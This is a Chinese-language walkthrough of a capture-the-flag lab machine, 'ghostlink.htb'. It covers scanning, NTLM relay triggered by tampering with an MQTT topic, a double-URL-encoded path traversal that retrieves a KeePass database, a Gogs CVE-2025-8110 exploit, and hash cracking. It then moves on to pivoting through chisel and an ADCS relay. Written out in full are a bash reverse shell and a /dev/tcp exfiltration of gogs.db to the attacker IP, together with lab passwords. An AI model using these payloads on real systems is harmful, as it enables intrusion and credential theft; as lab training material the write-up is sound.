1 2 3 4 ip a 10.129.26.130 TARGET="10.129.26.130"
01.信息搜集 靶机发现 目标靶机 ip 为
端口发现 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 fscan -h $TARGET > fscan.log # ===== 开放端口 ===== 10.129.26.130:53 10.129.26.130:445 10.129.26.130:80 10.129.26.130:636 10.129.26.130:135 10.129.26.130:88 10.129.26.130:139 10.129.26.130:389 10.129.26.130:3268 10.129.26.130:3269 10.129.26.130:1883 10.129.26.130:5985 # ===== Web服务 ===== http://10.129.26.130:139 //404 http://10.129.26.130:80 // 一个视频 http://10.129.26.130:5985 //404 grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+:[0-9]+' result.txt | sed 's/^.*://' | sort -nu
两个 http 一个 mqtt 服务
02.渗透打点 端口扫描 1 2 3 sudo nmap -sT -sV -sC -O -p 53,80,88,135,139,389,445,636,1883,3268,3269,5985 $TARGET -oA nmapscan/detailsudo nmap -Pn -sV -A -p 445 -T4 $TARGET
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Ghost Protocol Zero 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time : 2026-07-10 11:47:35Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ghostlink.htb, Site: Default-First-Site-Name) |_ssl-date : TLS randomness does not represent time | ssl-cert: Subject: commonName=dc01.ghostlink.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.ghostlink.htb | Not valid before: 2026-03-03T16:53:53 |_Not valid after: 2027-03-03T16:53:53 445/tcp open microsoft-ds? 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: ghostlink.htb, Site: Default-First-Site-Name) |_ssl-date : TLS randomness does not represent time | ssl-cert: Subject: commonName=dc01.ghostlink.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.ghostlink.htb | Not valid before: 2026-03-03T16:53:53 |_Not valid after: 2027-03-03T16:53:53 1883/tcp open mqtt | mqtt-subscribe: | Topics and their most recent payloads: | $SYS /brokers/client_status/mqttui-cf2ab236: {"status" :"offline" , "username" :"(null)" ,"ts" :1783684119609,"reason_code" :"0" ,"client_id" :"mqttui-cf2ab236" ,"IPv4" :"127.0.0.1" } | $SYS /brokers/client_status/mqttui-c1cc214e: {"status" :"online" , "username" :"(null)" , "ts" :1783684123903,"proto_name" :"MQTT" ,"keepalive" :60,"return_code" :"0" ,"proto_ver" :4,"client_id" :"mqttui-c1cc214e" ,"clean_start" :1, "IPv4" :"127.0.0.1" } |_ $SYS /brokers/client_status/mqttui-a2bec8ca: {"status" :"offline" , "username" :"(null)" ,"ts" :1783684121807,"reason_code" :"0" ,"client_id" :"mqttui-a2bec8ca" ,"IPv4" :"127.0.0.1" } 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ghostlink.htb, Site: Default-First-Site-Name) |_ssl-date : TLS randomness does not represent time | ssl-cert: Subject: commonName=dc01.ghostlink.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.ghostlink.htb | Not valid before: 2026-03-03T16:53:53 |_Not valid after: 2027-03-03T16:53:53 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: ghostlink.htb, Site: Default-First-Site-Name) |_ssl-date : TLS randomness does not represent time | ssl-cert: Subject: commonName=dc01.ghostlink.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.ghostlink.htb | Not valid before: 2026-03-03T16:53:53 |_Not valid after: 2027-03-03T16:53:53 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type : general purpose Running (JUST GUESSING): Microsoft Windows 2022 (88%) OS CPE: cpe:/o:microsoft:windows_server_2022 Aggressive OS guesses: Microsoft Windows Server 2022 (88%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows 517.54 ms 10.10.16.1 2 777.04 ms ghostlink.htb (10.129.26.130)
这里信息量挺大的
mqtt 1883 首先是 mqtt , Nmap 自带的 mqtt-subscribe 脚本直接帮我们枚举出了 Topic(主题)。输出中出现了 $SYS/brokers/client_status/mqttui-xxx,证明该服务允许匿名订阅。
1 2 3 4 Topics and their most recent payloads: | $SYS/brokers/client_status/mqttui-cf2ab236: {"status":"offline", "username":"(null)","ts":1783684119609,"reason_code":"0","client_id":"mqttui-cf2ab236","IPv4":"127.0.0.1"} | $SYS/brokers/client_status/mqttui-c1cc214e: {"status":"online", "username":"(null)", "ts":1783684123903,"proto_name":"MQTT","keepalive":60,"return_code":"0","proto_ver":4,"client_id":"mqttui-c1cc214e","clean_start":1, "IPv4":"127.0.0.1"} |_ $SYS/brokers/client_status/mqttui-a2bec8ca: {"status":"offline", "username":"(null)","ts":1783684121807,"reason_code":"0","client_id":"mqttui-a2bec8ca","IPv4":"127.0.0.1"}
域名信息 Domain: ghostlink.htb DNS:dc 01.ghostlink.htb
smb 445 注意smb2-security-mode 显示 Message signing enabled and required。 这意味着无法直接进行 SMB 中继攻击(即不能把捕获的 NTLM 中继到 445 端口)。所以后续使用ntlmrelayx时,必须加上–no-smb-server并指定 -t http:// ,将认证中继到 80 端口的 Web 应用,而不是 SMB
1 2 3 4 5 6 Host script results: | smb2-time: | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required |_clock-skew: 7h59m58s
UDP 扫描 1 sudo nmap -sU --top-ports 20 $TARGET -oA nmapscan/udp
1 2 3 4 5 6 PORT STATE SERVICE 53/udp open domain 67/udp open|filtered dhcps 68/udp open|filtered dhcpc 69/udp open|filtered tftp 123/udp open ntp
03.渗透测试 先配置 hosts
1 echo "10.129.26.130 ghostlink.htb" | sudo tee -a /etc/hosts
连接 mqtt
1 2 # 安装client brew install mqttui
匿名订阅
1 ./mqttui -b mqtt://ghostlink.htb
订阅到的主题中出现了两个内部主机名:
gpz-op26-secure.ghostlink.htb —— 一个安全文件共享应用(需认证)
gpz-op26-toolkits.ghostlink.htb —— Gogs 代码托管服务(版本 0.13.3)
1 2 3 4 echo "10.129.26.130 dc01.ghostlink.htb" | sudo tee -a /etc/hosts echo "10.129.26.130 gpz-op26-secure.ghostlink.htb" | sudo tee -a /etc/hosts echo "10.129.26.130 gpz-op26-toolkits.ghostlink.htb" | sudo tee -a /etc/hosts
secure 需要账号密码
toolkits 显示 Git 服务
看看用户列表
1 2 3 4 5 vroth Vesper Roth nvirelli Nyx Virelli gpz-tools-admin zkovacs Zara Kovacs ohexley Orin Hexley
“对不起,注册邮箱确认功能已被关闭。” 无法注册用户
找找 CVE
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 ### Web 指纹识别 whatweb http://gpz-op26-toolkits.ghostlink.htb \ --log-json ./scans/whatweb.json | tee ./scans/whatweb-output.txt 输出: [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx], IP[10.129.26.108], Script[module], Title[Langflow], UncommonHeaders[x-content-type-options,referrer-policy,content-security-policy], X-UA-Compatible[IE=edge], nginx 提取关键指纹: { jq -r '.[].plugins | keys[]' ./scans/whatweb.json jq -r '.[].plugins.Title.string[0] // empty' ./scans/whatweb.json } | grep -v -E '^(Country|IP|Script|UncommonHeaders|X-UA-Compatible|HTTPServer)$' \ | sort -u > ./scans/tech-stack.txt # gogs ### CVE 漏洞扫描 #### 创建目标列表 echo "http://gpz-op26-toolkits.ghostlink.htb" > ./scans/live-urls.txt //不要带子目录 #### Nuclei 指纹定向扫描 // -tags 手动填写 nuclei -disable-update-check \ -l ./scans/live-urls.txt \ -t /Users/choco/Project/HackTool/templates/nuclei-templates/ \ -t /Users/choco/Project/HackTool/templates/community/ \ -tags gogs \ -o ./scans/nuclei-results.txt \ -jsonl -j ./scans/nuclei-results.jsonl #### Nuclei 全量扫描 nuclei -disable-update-check \ -l ./scans/live-urls.txt \ -t /Users/choco/Project/HackTool/templates/nuclei-templates/ \ -t /Users/choco/Project/HackTool/templates/community/ \ -o ./scans/nuclei-results.txt \ -jsonl -j ./scans/nuclei-results.jsonl #### 命中 CVE 提取 grep -oE 'CVE-\d{4}-\d+' ./scans/nuclei-results.txt | sort -u > ./scans/hit-cves.txt # CVE-2025-8110 #### 查找 PoC while read cve; do echo ">>> 处理 $cve" /Users/choco/Project/HackTool/tools/cve-find.sh "$cve" done < ./scans/hit-cves.txt /Users/choco/Project/HackTool/tools/poc-find.sh CVE-2025-8110 https://github.com/zAbuQasem/gogs-CVE-2025-8110
这里 nuclei 的查找还是不太行 直接在文件夹里面搜还快些 或者 jq -r '[."template-id", ."matched-at", ."template-path"] | @tsv' ./scans/nuclei-results.jsonl 看看命中了哪些 yaml
CVE-2025-8110 Authenticated users can exploit improper symbolic link handling in the PutContents API to overwrite files outside the repository by committing a symlink pointing to sensitive targets, leading to remote code execution.
需要登录进 gogs
获取身份认证凭据
Net-Ntlm relay 攻击的大致思路就是在 Ntlm 协议认证的第三步,通过获取 hash 值,然后进行重放到服务器上进行验证。所以我们这里大致分为两步,第一步是获得 Net-Ntlm hash 值,然后是进行重放。
入口(触发点):MQTT 服务允许匿名修改 Topic(主题),我们可以让 svc_canary 主动访问我们。 出口(目标点):http://gpz-op26-secure.ghostlink.htb 这个文件共享应用支持 NTLM 认证。 漏洞:SMB(445)开启了签名(Message Signing),无法中继到 SMB,但 HTTP 不需要签名,所以能中继到 Web 应用。
那么想办法共享到出口的身份凭据就好了
Attacker 转发 使用 ghostsurfhttps://github.com/senderend/ghostsurf
补丁: vim lib/relay/utils/config.py 52 行 self.remove_target = False
我们中继的是 HTTP 而非 SMB,必须禁用 SMB 服务器,并开启 SOCKS 代理以便后续浏览器访问
1 ./ghostsurf -t http://gpz-op26-secure.ghostlink.htb -r -k --http-port 8888 --no-smb-server
HTTP 端口 8888:等待靶机连接 SOCKS 端口 1080:等待我们的浏览器连接
篡改 MQTT 消息 钓鱼触发 我们现在要修改 MQTT 中的健康检查 Topic,让 svc_canary 服务去访问我们的陷阱服务器(端口 8888)。
操作:读取当前 Topic 内容,将 url 字段修改为我们的 IP 和端口,然后发布回去。攻击机 ip 10.10.17.11
1 2 3 4 5 6 7 8 9 # 原始 Payload(查看): {"timestamp":"2026-03-03-09:26:21","node":"node-6","telemetry":{"healthy":true,"url":"gpz-op 26-secure.ghostlink.htb/healthcheck","lastCheckSecAgo":45,"responseCode":"200","ip":"172.16.20.10"}} # 修改后的 Payload(发布): {"timestamp":"2026-03-03-09:26:21","node":"node-6","telemetry":{"healthy":true,"url":"http://10.10.17.11:8888","lastCheckSecAgo":45,"responseCode":"200","ip":"172.16.20.10"}} # 发布命令(使用 mqttui): mqttui -b mqtt://ghostlink.htb publish -r "GhostProtocolZero/systems/node/secureshare/healthcheck" '{"timestamp":"2026-03-03-09:26:21","node":"node-6","telemetry":{"healthy":true,"url":"http://10.10.17.11:8888","lastCheckSecAgo":45,"responseCode":"200","ip":"172.16.20.10"}}'
握手与中继 自动完成 svc_canary 访问我们:后端服务读取 MQTT 消息,用 HTTP GET 请求 http://10.10.14.2:8888
陷阱服务器回复 401:ghostsurf 返回 401 Unauthorized,附带 WWW-Authenticate: NTLM 头。
svc_canary 发起 NTLM 握手:它计算自己的 NTLM 哈希,封装在 HTTP 头 Authorization: NTLM base64>中发回来。 ghostsurf 瞬间转发:工具收到这个数据包,不进行任何修改,直接原样发送给 http://gpz-op26-secure.ghostlink.htb。 目标应用认证通过:文件共享应用验证成功,返回 200 OK 和页面内容。 此时,ghostsurf 控制台会打印:
1 2 [*] (HTTP): Authenticating connection from GHOSTLINK/ SVC_CANARY@10.129.244.158 against http://gpz-op26-secure.ghostlink.htb SUCCEED [1] [*] SOCKS: Adding GHOSTLINK/ SVC_CANARY@gpz-op26-secure.ghostlink.htb (80) to active SOCKS connection. Enjoy
SOCKS 代理访问 浏览器配置(firefox) 设置 -> 网络设置 -> 手动代理配置。 SOCKS 主机:127.0.0.1,端口 1080,选择 SOCKS v 5。 勾选“对 DNS 使用 SOCKS v 5 代理”(避免本地 DNS 解析泄露) 配置好后,在浏览器访问 http://gpz-op26-secure.ghostlink.htb
上传一个文件看看 拿不到回显
看看 nethttp://gpz-op26-secure.ghostlink.htb/api/upload
1 2 3 4 curl -x socks5h://127.0.0.1:1080 \ -F "file=@./1..txt" \ -F "note=test" \ http://gpz-op26-secure.ghostlink.htb/api/upload -v
会拿到 /api/download 的端口 用路径遍历漏洞下载系统文件(如 ntuser.dat)。构造双重 URL 编码的路径
1 2 3 4 5 6 7 8 9 10 # kali regripper -r ntuser.dat -a | grep -i recent -A 3 -B 3 Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs LastWrite Time: 2026-05-13 01:56:02Z Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip LastWrite Time 2026-05-13 01:56:02Z MRUListEx = 0 0 = db.zip
看到 db.zip
注册表中的 RecentDocs 对应的是 %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\ 目录下的 .lnk 快捷方式文件。
所以 db.zip 的真实路径是:
C:\Users\svc_canary\AppData\Roaming\Microsoft\Windows\Recent\db.zip.lnk
使用和之前完全一样的双重 URL 编码绕过,通过 /api/download/ 下载这个 .lnk 文件
1 2 3 4 5 6 7 8 9 10 11 12 curl -x socks5h://127.0.0.1:1080 \ "http://gpz-op26-secure.ghostlink.htb/api/download/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%2575%2573%2565%2572%2573%255c%2573%2576%2563%255f%2563%2561%256e%2561%2572%2579%255c%2541%2570%2570%2544%2561%2574%2561%255c%2552%256f%2561%256d%2569%256e%2567%255c%254d%2569%2563%2572%256f%2573%256f%2566%2574%255c%2557%2569%256e%2564%256f%2577%2573%255c%2552%2565%2563%2565%256e%2574%255c%2564%2562%252e%257a%2569%2570%252e%256c%256e%256b" \ -o db.zip.lnk strings db.zip.lnk OPERAT~1 MANAGE~1 db.zip C:\Users\svc_canary\Documents\Operations\Management\db.zip gpz-op26-secure 1SPS
拿到真实路径后,再次构造编码路径下载这个 db.zip 文件
1 2 3 4 5 6 7 8 curl -x socks5h://127.0.0.1:1080 \ "http://gpz-op26-secure.ghostlink.htb/api/download/%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%25%37%35%25%37%33%25%36%35%25%37%32%25%37%33%25%35%63%25%37%33%25%37%36%25%36%33%25%35%66%25%36%33%25%36%31%25%36%65%25%36%31%25%37%32%25%37%39%25%35%63%25%34%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%37%33%25%35%63%25%34%66%25%37%30%25%36%35%25%37%32%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%37%33%25%35%63%25%34%64%25%36%31%25%36%65%25%36%31%25%36%37%25%36%35%25%36%64%25%36%35%25%36%65%25%37%34%25%35%63%25%36%34%25%36%32%25%32%65%25%37%61%25%36%39%25%37%30" \ -o db.zip unzip db.zip Archive: db.zip inflating: db.kdbx inflating: .key.keyx
成功拿到了 KeePass 数据库(db.kdbx)和密钥文件(.key.keyx)
kali 解一下数据库 看看登录凭据
1 kpcli --kdb db.kdbx --key .key.keyx5
这里 key 是明文字符串 得用 keepass
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 python3 -c " from pykeepass import PyKeePass kp = PyKeePass('db.kdbx', keyfile='.key.keyx') for entry in kp.entries: print(f'{entry.title}: {entry.password}') " core-telecom.ghostlink.htb: None energy-grid.ghostlink.htb: None transport.ghostlink.htb: None dc01.ghostlink.htb: None gpz-op26-secure.ghostlink.htb: None gpz-op26-toolkits.ghostlink.htb: None Nyx Virelli: None Kael Draven: None Zara Kovacs: None Orin Hexley: None Vesper Roth: mOo03jpsqx8JQYMBwvFP Dax Soren: None Lyra Noctis: None Domain Password Policy: None
也就是
账号密码 用户:Vesper Roth 用户名:vroth 密码:mOo03jpsqx8JQYMBwvFP
toolkits 登录成功 可以 cve 了
POC parser.add_argument(“-u”, “–url”, required=True, help=”Gogs base URL”) parser.add_argument(“-lh”, “–host”, required=True, help=”Attacker host”) parser.add_argument(“-lp”, “–port”, required=True, help=”Attacker port”) parser.add_argument(“-x”, “–proxy”, action=”store_true”, help=”Use proxy”)
(账号密码在脚本里硬编码)
1 2 3 nc -lv 9001 python3 poc.py -u http://gpz-op26-toolkits.ghostlink.htb -lh 10.10.17.11 -lp 9001
报错 Registration failed: 403 [-] Error: Registration failed
前面知道这个网址关闭了注册功能 所以得手动去掉 main 函数里面的 register(session, args.url, username, password)
然后 python3 poc.py -u http://gpz-op26-toolkits.ghostlink.htb -lh 10.10.17.11 -lp 9001
04.提权 git 找点有价值的东西
1 2 3 4 5 6 7 8 9 10 git@gpz-op26-toolkits:~/data$ ls -liah ls -liah total 412K 1704 drwxr-xr-x 6 git git 4.0K Jul 10 11:55 . 1700 drwxr-xr-x 7 git git 4.0K Jul 10 11:54 .. 1720 drwxr-xr-x 2 git git 4.0K Mar 4 12:13 avatars 1730 -rw-r--r-- 1 git git 388K Jul 10 11:55 gogs.db 1713 drwx------ 18 git git 4.0K Jul 10 08:37 sessions 1712 drwxr-xr-x 2 git git 4.0K Mar 4 00:29 ssh 2437 drwxr-xr-x 3 git git 4.0K Jul 10 11:53 tmp
Gogs 的数据库(SQLite)包含所有用户的密码哈希。我们把它弄回攻击机
1 2 3 4 5 nc -lv 4444 > gogs.db base64 -w0 /opt/gogs/data/gogs.db > /dev/tcp/10.10.17.11/4444 base64 -d -i gogs.b64 > gogs.db
解哈希 提取数据库
1 2 3 4 5 6 sqlite3 gogs.db "select name, hex(passwd), salt from user;" vroth|31323532386261363431386139373431353738613333653037353962326538333735343730323639623732303036396363616233386635633163623363323837653462663331396361376264373030643964386137333935613432323265356162333236|6y62BTJVSO nvirelli|38643962336130316333613032363062333964623031316165643164626632333962386231623238616636313431663238616130316433623361623866666434343038626335623930363566663935376537313633373561376265633137353564336538|DW3YdxPy25 gpz-tools-admin|65633561376139666333343137383436623762616566326433303165396130626561656366323030666435663333616132333563373263326230613230366635383265616230353333326436653637393963373861343533383762326237666537303134|CIRi441QwX zkovacs|61376462626537663535643265346136366538653761613166306664643563616464646263336665346430366130363037383265316235393835393539343631363935656139646130383936353330393962323231633064633332366361616430316132|qMOaBu0l1B ohexley|36623238366638396466313736616536343035646337356363343336663062363439336564326332396130623663313336336331313162323262323330373565626437393063343031356533313564646233643737306333663763616139376436363230|OEVEC4I5Io
hash.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import binascii, base64 users = [ ("vrotch", "31323532386261363431386139373431353738613333653037353962326538333735343730323639623732303036396363616233386635633163623363323837653462663331396361376264373030643964386137333935613432323265356162333236", "6y62BTJVSO"), ("nvirelli", "38643962336130316333613032363062333964623031316165643164626632333962386231623238616636313431663238616130316433623361623866666434343038626335623930363566663935376537313633373561376265633137353564336538", "DW3YdxPy25"), ("gpz-tools-admin", "65633561376139666333343137383436623762616566326433303165396130626561656366323030666435663333616132333563373263326230613230366635383265616230353333326436653637393963373861343533383762326237666537303134", "CIRi441QwX"), ("zkovacs", "61376462626537663535643265346136366538653761613166306664643563616464646263336665346430366130363037383265316235393835393539343631363935656139646130383936353330393962323231633064633332366361616430316132", "qMOaBu0l1B"), ("ohexley", "36623238366638396466313736616536343035646337356363343336663062363439336564326332396130623663313336336331313162323262323330373565626437393063343031356533313564646233643737306333663763616139376436363230", "OEVEC4I5Io") ] for name, hash_hex, salt_str in users: hash_bytes = binascii.unhexlify(hash_hex) b64_hash = base64.b64encode(hash_bytes).decode() b64_salt = base64.b64encode(salt_str.encode()).decode() print(f"sha256:10000:{b64_salt}:{b64_hash}")
1 2 3 4 sha256:10000:RFczWWR4UHkyNQ==:OGQ5YjNhMDFjM2EwMjYwYjM5ZGIwMTFhZWQxZGJmMjM5YjhiMWIyOGFmNjE0MWYyOGFhMDFkM2IzYWI4ZmZkNDQwOGJjNWI5MDY1ZmY5NTdlNzE2Mzc1YTdiZWMxNzU1ZDNlOA== sha256:10000:Q0lSaTQ0MVF3WA==:ZWM1YTdhOWZjMzQxNzg0NmI3YmFlZjJkMzAxZTlhMGJlYWVjZjIwMGZkNWYzM2FhMjM1YzcyYzJiMGEyMDZmNTgyZWFiMDUzMzJkNmU2Nzk5Yzc4YTQ1Mzg3YjJiN2ZlNzAxNA== sha256:10000:cU1PYUJ1MGwxQg==:YTdkYmJlN2Y1NWQyZTRhNjZlOGU3YWExZjBmZGQ1Y2FkZGRiYzNmZTRkMDZhMDYwNzgyZTFiNTk4NTk1OTQ2MTY5NWVhOWRhMDg5NjUzMDk5YjIyMWMwZGMzMjZjYWFkMDFhMg== sha256:10000:T0VWRUM0STVJbw==:NmIyODZmODlkZjE3NmFlNjQwNWRjNzVjYzQzNmYwYjY0OTNlZDJjMjlhMGI2YzEzNjNjMTExYjIyYjIzMDc1ZWJkNzkwYzQwMTVlMzE1ZGRiM2Q3NzBjM2Y3Y2FhOTdkNjYyMA==
hashcat
1 2 3 hashcat -a 0 -m 10900 sha256:10000:RFczWWR4UHkyNQ==:jZs6AcOgJgs52wEa7R2/I5uLGyivYUHyiqAdOzq4/9RAi8W5Bl/5V+cWN1p77BdV0+g= ./trimmed.txt sha256:10000:RFczWWR4UHkyNQ==:jZs6AcOgJgs52wEa7R2/I5uLGyivYUHyiqAdOzq4/9RAi8W5Bl/5V+cWN1p77BdV0+g=:u47YUclrDiwWxBheaSzI
那就 DW3YdxPy25 // u47YUclrDiwWxBheaSzI 对应 用户 nvirelli
nvirelli 1 2 3 4 5 su nvirelli u47YUclrDiwWxBheaSzI /bin/bash -c 'bash -i >& /dev/tcp/10.10.17.11/9002 0>&1' nc -lv 9002
windows 的话后续应该是考虑域渗透
域渗透 1 2 3 4 5 6 7 8 9 wget https://github.com/jpillora/chisel/releases/download/v1.11.7/ # 攻击机 chisel_1.11.7_darwin_amd64.gz # 靶机 chisel_1.11.7_linux_amd64.gz gunzip chisel_1.11.7_linux_amd64.gz chmod +x chisel_1.11.7_linux_amd64 mv chisel_1.11.7_linux_amd64 chisel
攻击机服务端开启
1 2 ./chisel server -p 8000 --reverse & python3 -m http.server 8080
靶机下载 chisel 反连
1 2 3 4 wget http://10.10.17.11:8080/chisel -O /tmp/chisel chmod +x /tmp/chisel /
1 2 3 4 5 6 7 8 9 10 11 12 13 mkdir -p ~/.config/proxychains cat > ~/.config/proxychains/proxychains.conf << 'EOF' strict_chain proxy_dns remote_dns_subnet 224 tcp_read_time_out 15000 tcp_connect_time_out 8000 localnet 127.0.0.0/255.0.0.0 quiet_mode [ProxyList] socks5 127.0.0.1 1080 EOF
以后每次运行 proxychains 4 时,用 -f 指定这个文件:
1 proxychains 4 -f ~/.config/proxychains/proxychains.conf -q cmd
1 2 echo 'alias pc="proxychains 4 -f ~/.config/proxychains/proxychains.conf -q"' >> ~/.zshrc source ~/.zshrc
1 2 3 4 5 6 7 8 9 10 pc curl -I http://dc01.ghostlink.htb HTTP/1.1 200 OK Content-Length: 682 Content-Type: text/html Last-Modified: Thu, 26 Feb 2026 20:18:12 GMT Accept-Ranges: bytes ETag: "36a06185da7dc1:0" Server: Microsoft-IIS/10.0 Date: Fri, 10 Jul 2026 17:23:06 GMT
1 2 3 4 5 pc certipy find -u 'nvirelli@ghostlink.htb' -p u47YUclrDiwWxBheaSzI -dc-host dc01.ghostlink.htb -ns 10.129.26.130 -dns-tcp -timeout 10 -vulnerable -stdout sudo certipy relay -ca 'ghostlink-GPZ-OP26-SECURE-CA' -target rpc://10.129.26.130 -template DomainController coercer coerce -l 10.10.17.11 -t 10.129.26.130 -d ghostlink.htb -u nvirelli -p 'u47YUclrDiwWxBheaSzI' --dc-ip 10.129.26.130 --always-continue
这里要找域控 DC 的 ip 但是靶机里半天找不到 可以回头去./mqttui -b mqtt://ghostlink.htb